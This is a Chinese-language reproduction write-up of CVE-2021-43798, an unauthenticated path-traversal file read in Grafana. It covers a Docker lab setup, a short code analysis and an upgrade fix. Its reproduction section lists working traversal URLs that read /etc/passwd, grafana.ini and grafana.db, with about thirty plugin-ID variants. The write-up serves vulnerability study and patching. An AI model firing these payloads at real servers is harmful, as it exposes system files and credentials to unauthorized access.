CVE-2021-43798:Grafana任意文件读取漏洞
CVE-2021-43798:Grafana任意文件读取漏洞
0x01 简介
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
0x02 漏洞概述
编号:CVE-2021-43798
未授权的攻击者利用该漏洞,能够获取服务器敏感文件。
0x03 影响版本
Grafana 8.0.0 - 8.3.0
0x04 环境搭建
docker pull grafana/grafana:8.2.6
docker run -p 3000:3000 grafana/grafana:8.2.6
访问3000端口即可
0x05 漏洞复现
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd
gettingstarted是插件ID,Grafana默认安装的就有。也可以改成别的插件ID
读取Grafana配置文件
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini
读取Grafana数据库
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db
其他师傅fuzz的插件清单
https://github.com/jas502n/Grafana-VulnTips/blob/main/README.md
/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd0x06 漏洞分析
路由从这里进入
在plugins.go的getPluginAssets函数中,获取用户传入的pluginId后,如果存在,则拼接插件目录和用户传入参数。未进行任何过滤,便直接返回
pluginId可以在这里看到。随便点个插件抓个包请求路径中就包含pluginId。这些插件是默认安装的,所以实际利用时不需要登录后查看
0x07 修复方式
请升级至最新版本:
https://github.com/grafana/grafana
参考链接:https://nvd.nist.gov/vuln/detail/CVE-2021-43798
https://github.com/jas502n/Grafana-VulnTips/blob/main/README.md